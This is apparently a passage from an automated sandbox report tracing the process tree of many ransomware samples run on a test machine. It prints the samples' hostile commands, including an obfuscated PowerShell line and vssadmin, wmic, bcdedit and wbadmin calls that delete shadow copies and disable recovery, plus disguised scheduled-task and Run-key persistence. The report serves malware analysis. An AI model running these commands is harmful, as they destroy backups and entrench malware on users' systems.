                                                  • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Foreign.gen-f0c73e683743fcaf091322ee875d7bd76475adfb86d80af384d809177b945696.exe
                                                    HEUR-Trojan-Ransom.MSIL.Foreign.gen-f0c73e683743fcaf091322ee875d7bd76475adfb86d80af384d809177b945696.exe
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:3228
                                                  • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe
                                                    HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe
                                                    3⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies registry class
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2928
                                                    • C:\Windows\SysWOW64\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
                                                      4⤵
                                                      • Checks computer location settings
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1052
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\File1.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\File1.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Drops desktop.ini file(s)
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3440
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\File2.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\File2.exe"
                                                        5⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2156
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Defender" /tr '"C:\Users\Admin\AppData\Roaming\Windows Defender"' & exit
                                                          6⤵
                                                            PID:4596
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc onlogon /rl highest /tn "Windows Defender" /tr '"C:\Users\Admin\AppData\Roaming\Windows Defender"'
                                                              7⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2456
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:5484
                                                    • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe
                                                      HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:4644
                                                    • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1af0659e1375552c88339146c38d870f9808fd4bfcf93d026aa0698aa89cdf23.exe
                                                      HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1af0659e1375552c88339146c38d870f9808fd4bfcf93d026aa0698aa89cdf23.exe
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2276
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 408
                                                        4⤵
                                                        • Program crash
                                                        PID:2388
                                                    • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe
                                                      HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Enumerates connected drives
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3432
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        wmic.exe SHADOWCOPY /nointeractive
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1996
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        wmic.exe SHADOWCOPY /nointeractive
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3680
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        wmic.exe SHADOWCOPY /nointeractive
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3688
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          5⤵
                                                            PID:1052
                                                        • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                          wmic.exe SHADOWCOPY /nointeractive
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4948
                                                        • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                          wmic.exe SHADOWCOPY /nointeractive
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5372
                                                      • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Stop.gen-8a9aa2c6397edec14772b76171a223259ec3190e3cef4cf6774d2eb9435a30f6.exe
                                                        HEUR-Trojan-Ransom.Win32.Stop.gen-8a9aa2c6397edec14772b76171a223259ec3190e3cef4cf6774d2eb9435a30f6.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1600
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          C:\Windows\system32\rundll32.exe C:\Users\Admin\Desktop\00436\HED62F~1.DLL,Z C:\Users\Admin\Desktop\00436\HED62F~1.EXE
                                                          4⤵
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:640
                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\Desktop\00436\HED62F~1.DLL,hF8l
                                                            5⤵
                                                            • Blocklisted process makes network request
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3688
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 520
                                                          4⤵
                                                          • Program crash
                                                          PID:2388
                                                      • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Bitman.aiyl-33265f47eeaf55e96e5e3c3bf600c585dfc1a3c9562e8891342956a6c033d2c1.exe
                                                        Trojan-Ransom.Win32.Bitman.aiyl-33265f47eeaf55e96e5e3c3bf600c585dfc1a3c9562e8891342956a6c033d2c1.exe
                                                        3⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        PID:4292
                                                        • C:\Windows\Temp\KA57j.exe
                                                          "C:\Windows\Temp\KA57j.exe" C:\Windows\Temp\KA57j.sys
                                                          4⤵
                                                          • Sets service image path in registry
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: LoadsDriver
                                                          PID:6128
                                                      • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe
                                                        Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe
                                                        3⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3532
                                                        • C:\Users\Admin\AppData\Roaming\ddd.exe
                                                          "C:\Users\Admin\AppData\Roaming\ddd.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4512
                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                            dw20.exe -x -s 844
                                                            5⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4264
                                                      • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe
                                                        Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        • Drops file in System32 directory
                                                        • Drops file in Windows directory
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies Control Panel
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2036
                                                        • C:\Windows\xk.exe
                                                          C:\Windows\xk.exe
                                                          4⤵
                                                            PID:2852
                                                          • C:\Windows\SysWOW64\IExplorer.exe
                                                            C:\Windows\system32\IExplorer.exe
                                                            4⤵
                                                              PID:1212
                                                            • C:\Windows\xk.exe
                                                              C:\Windows\xk.exe
                                                              4⤵
                                                                PID:15344
                                                              • C:\Windows\SysWOW64\IExplorer.exe
                                                                C:\Windows\system32\IExplorer.exe
                                                                4⤵
                                                                  PID:3900
                                                                • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
                                                                  "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
                                                                  4⤵
                                                                    PID:12092
                                                                  • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
                                                                    "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
                                                                    4⤵
                                                                      PID:12020
                                                                    • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
                                                                      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
                                                                      4⤵
                                                                        PID:5756
                                                                      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
                                                                        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
                                                                        4⤵
                                                                          PID:15044
                                                                        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
                                                                          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
                                                                          4⤵
                                                                            PID:9224
                                                                        • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Blocker.nage-ebe3c86f238c4b3cbe2d52e93471c1ca94cb7c9d449108300294256e837a71a9.exe
                                                                          Trojan-Ransom.Win32.Blocker.nage-ebe3c86f238c4b3cbe2d52e93471c1ca94cb7c9d449108300294256e837a71a9.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4136
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\zapuskbezcmd.vbs"
                                                                            4⤵
                                                                              PID:13080
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c windows.exe
                                                                                5⤵
                                                                                  PID:9524
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\windows.exe
                                                                                    windows.exe
                                                                                    6⤵
                                                                                      PID:13228
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\windows.exe
                                                                                        windows.exe
                                                                                        7⤵
                                                                                          PID:11164
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe""
                                                                                            8⤵
                                                                                              PID:13092
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe"
                                                                                                9⤵
                                                                                                • Modifies registry key
                                                                                                PID:13328
                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\sound.vbs"
                                                                                      4⤵
                                                                                        PID:10104
                                                                                    • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Cryptor.eev-89cc8fa7a2d2fef1b7e292682121cc65dedb8e0d5cd926977dfae49f25410f4c.exe
                                                                                      Trojan-Ransom.Win32.Cryptor.eev-89cc8fa7a2d2fef1b7e292682121cc65dedb8e0d5cd926977dfae49f25410f4c.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:64
                                                                                    • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
                                                                                      Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Modifies registry class
                                                                                      PID:5156
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:5316
                                                                                    • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe
                                                                                      Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5592
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8E7F.tmp\8E80.tmp\8E81.bat C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe"
                                                                                        4⤵
                                                                                          PID:5788
                                                                                          • C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                            "C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
                                                                                            5⤵
                                                                                              PID:5364
                                                                                            • C:\Windows\system32\ipconfig.exe
                                                                                              ipconfig /release
                                                                                              5⤵
                                                                                              • Gathers network information
                                                                                              PID:5456
                                                                                        • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe
                                                                                          Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5960
                                                                                          • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe
                                                                                            Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe
                                                                                            4⤵
                                                                                            • Modifies firewall policy service
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Adds Run key to start application
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Modifies registry class
                                                                                            PID:6048
                                                                                            • C:\Users\Admin\K-37763-383-2847-00\winsrc.exe
                                                                                              "C:\Users\Admin\K-37763-383-2847-00\winsrc.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:1532
                                                                                              • C:\Users\Admin\K-37763-383-2847-00\winsrc.exe
                                                                                                "C:\Users\Admin\K-37763-383-2847-00\winsrc.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3628
                                                                                        • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.GandCrypt.abw-9becd904847b2dabd1a03df45210d7233fdda9927eac6d87c75bab53947ce5f1.exe
                                                                                          Trojan-Ransom.Win32.GandCrypt.abw-9becd904847b2dabd1a03df45210d7233fdda9927eac6d87c75bab53947ce5f1.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:224
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 540
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:5268
                                                                                        • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Gen.abhj-633267a15766e9e6ac4dc3e2f3ea2e66b5146eb0e8980cf70f4bd2786680d573.exe
                                                                                          Trojan-Ransom.Win32.Gen.abhj-633267a15766e9e6ac4dc3e2f3ea2e66b5146eb0e8980cf70f4bd2786680d573.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5328
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AC87.tmp\AC88.tmp\AC89.bat C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Gen.abhj-633267a15766e9e6ac4dc3e2f3ea2e66b5146eb0e8980cf70f4bd2786680d573.exe"
                                                                                            4⤵
                                                                                              PID:5072
                                                                                          • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.GenericCryptor.cys-6455923a0d65f856c93c8d5262315527fef93cf18ea88761146d55d8236445d6.exe
                                                                                            Trojan-Ransom.Win32.GenericCryptor.cys-6455923a0d65f856c93c8d5262315527fef93cf18ea88761146d55d8236445d6.exe
                                                                                            3⤵
                                                                                              PID:4332
                                                                                              • C:\Users\Admin\AppData\Local\Temp\sudyr.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\sudyr.exe"
                                                                                                4⤵
                                                                                                  PID:5740
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\yzkod.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\yzkod.exe"
                                                                                                    5⤵
                                                                                                      PID:9064
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
                                                                                                    4⤵
                                                                                                      PID:1884
                                                                                                  • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Phpw.afp-3bf317c5fa28919bd9620f5a59ad3a418a6da5e28b64d785f8f429fe8a03b236.exe
                                                                                                    Trojan-Ransom.Win32.Phpw.afp-3bf317c5fa28919bd9620f5a59ad3a418a6da5e28b64d785f8f429fe8a03b236.exe
                                                                                                    3⤵
                                                                                                      PID:5492
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                        4⤵
                                                                                                          PID:15020
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Local\Temp\Update.exe"' & exit
                                                                                                            5⤵
                                                                                                              PID:10976
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Local\Temp\Update.exe"'
                                                                                                                6⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:17176
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8B2F.tmp.bat""
                                                                                                              5⤵
                                                                                                                PID:16860
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout 3
                                                                                                                  6⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:15864
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Update.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Update.exe"
                                                                                                                  6⤵
                                                                                                                    PID:12852
                                                                                                            • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Shade.oag-9d0cede51ac13eb7ec45379249054e27584a1ad208766035b84fe165da29f9d1.exe
                                                                                                              Trojan-Ransom.Win32.Shade.oag-9d0cede51ac13eb7ec45379249054e27584a1ad208766035b84fe165da29f9d1.exe
                                                                                                              3⤵
                                                                                                                PID:2092
                                                                                                              • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Sodin.agr-8bd2067d088dad4df24e11244f5b72ce1fd22b686e2ce9ba6ee8711f8f6a836d.exe
                                                                                                                Trojan-Ransom.Win32.Sodin.agr-8bd2067d088dad4df24e11244f5b72ce1fd22b686e2ce9ba6ee8711f8f6a836d.exe
                                                                                                                3⤵
                                                                                                                  PID:6036
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\System32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\MsMpEng.exe
                                                                                                                    4⤵
                                                                                                                      PID:5324
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MsMpEng.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\MsMpEng.exe
                                                                                                                        5⤵
                                                                                                                          PID:10556
                                                                                                                    • C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Wanna.araw-22eccaf0437a2e793d02ec892fb77d2d8ca7da77084177883474f3a020efc058.exe
                                                                                                                      Trojan-Ransom.Win32.Wanna.araw-22eccaf0437a2e793d02ec892fb77d2d8ca7da77084177883474f3a020efc058.exe
                                                                                                                      3⤵
                                                                                                                        PID:1668
                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                          attrib +h .
                                                                                                                          4⤵
                                                                                                                          • Views/modifies file attributes
                                                                                                                          PID:13836
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls . /grant Everyone:F /T /C /Q
                                                                                                                          4⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:13828
                                                                                                                        • C:\Users\Admin\Desktop\00436\taskdl.exe
                                                                                                                          taskdl.exe
                                                                                                                          4⤵
                                                                                                                            PID:14108
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c 208781729891047.bat
                                                                                                                            4⤵
                                                                                                                              PID:11072
                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                              attrib +h +s F:\$RECYCLE
                                                                                                                              4⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:11216
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /c start /b @[email protected] vs
                                                                                                                              4⤵
                                                                                                                                PID:11516
                                                                                                                                • C:\Users\Admin\Desktop\00436\@[email protected]
                                                                                                                                  PID:14784
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                                                    6⤵
                                                                                                                                      PID:16060
                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                        wmic shadowcopy delete
                                                                                                                                        7⤵
                                                                                                                                          PID:3560
                                                                                                                                  • C:\Users\Admin\Desktop\00436\taskse.exe
                                                                                                                                    taskse.exe C:\Users\Admin\Desktop\00436\@[email protected]
                                                                                                                                    4⤵
                                                                                                                                      PID:11920
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ovmsvvcyf828" /t REG_SZ /d "\"C:\Users\Admin\Desktop\00436\tasksche.exe\"" /f
                                                                                                                                      4⤵
                                                                                                                                        PID:16888
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ovmsvvcyf828" /t REG_SZ /d "\"C:\Users\Admin\Desktop\00436\tasksche.exe\"" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies registry key
                                                                                                                                          PID:12596
                                                                                                                                      • C:\Users\Admin\Desktop\00436\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        4⤵
                                                                                                                                          PID:16896
                                                                                                                                        • C:\Users\Admin\Desktop\00436\taskdl.exe
                                                                                                                                          taskdl.exe
                                                                                                                                          4⤵
                                                                                                                                            PID:6380
                                                                                                                                          • C:\Users\Admin\Desktop\00436\taskse.exe
                                                                                                                                            taskse.exe C:\Users\Admin\Desktop\00436\@[email protected]
                                                                                                                                            4⤵
                                                                                                                                              PID:16276
                                                                                                                                            • C:\Users\Admin\Desktop\00436\taskse.exe
                                                                                                                                              taskse.exe C:\Users\Admin\Desktop\00436\@[email protected]
                                                                                                                                              4⤵
                                                                                                                                                PID:14648
                                                                                                                                              • C:\Users\Admin\Desktop\00436\taskdl.exe
                                                                                                                                                taskdl.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:5980
                                                                                                                                                • C:\Users\Admin\Desktop\00436\taskse.exe
                                                                                                                                                  taskse.exe C:\Users\Admin\Desktop\00436\@[email protected]
                                                                                                                                                  4⤵
                                                                                                                                                    PID:15648
                                                                                                                                                  • C:\Users\Admin\Desktop\00436\taskdl.exe
                                                                                                                                                    taskdl.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:10504
                                                                                                                                                    • C:\Users\Admin\Desktop\00436\taskse.exe
                                                                                                                                                      taskse.exe C:\Users\Admin\Desktop\00436\@[email protected]
                                                                                                                                                      4⤵
                                                                                                                                                        PID:8292
                                                                                                                                                      • C:\Users\Admin\Desktop\00436\taskdl.exe
                                                                                                                                                        taskdl.exe
                                                                                                                                                        4⤵
                                                                                                                                                          PID:9720
                                                                                                                                                      • C:\Users\Admin\Desktop\00436\UDS-Trojan-Ransom.Win32.Petr.a-6d4c8d50f96df51a6aed547c04728115eea885123167fe18975aa5f965cd8eb0.exe
                                                                                                                                                        UDS-Trojan-Ransom.Win32.Petr.a-6d4c8d50f96df51a6aed547c04728115eea885123167fe18975aa5f965cd8eb0.exe
                                                                                                                                                        3⤵
                                                                                                                                                          PID:7048
                                                                                                                                                        • C:\Users\Admin\Desktop\00436\VHO-Trojan-Ransom.Win32.Convagent.gen-00e54d38d942d3924fa15f5dc933cccac57a972101c283e2cf6231ce02bebcc0.exe
                                                                                                                                                          VHO-Trojan-Ransom.Win32.Convagent.gen-00e54d38d942d3924fa15f5dc933cccac57a972101c283e2cf6231ce02bebcc0.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:8756
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\klikTower_protected.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\klikTower_protected.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:10908
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\klikTower_protected.exe" "klikTower_protected.exe" ENABLE
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  PID:15224
                                                                                                                                                            • C:\Users\Admin\Desktop\00436\VHO-Trojan-Ransom.Win32.Mbro.gen-837c1b6ede92ed28312d7e444f4896360c65abed2013d52a298fb2a1c62a7f4f.exe
                                                                                                                                                              VHO-Trojan-Ransom.Win32.Mbro.gen-837c1b6ede92ed28312d7e444f4896360c65abed2013d52a298fb2a1c62a7f4f.exe
                                                                                                                                                              3⤵
                                                                                                                                                                PID:7184
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2276 -ip 2276
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4392
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1600 -ip 1600
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2308
                                                                                                                                                              • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5564
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
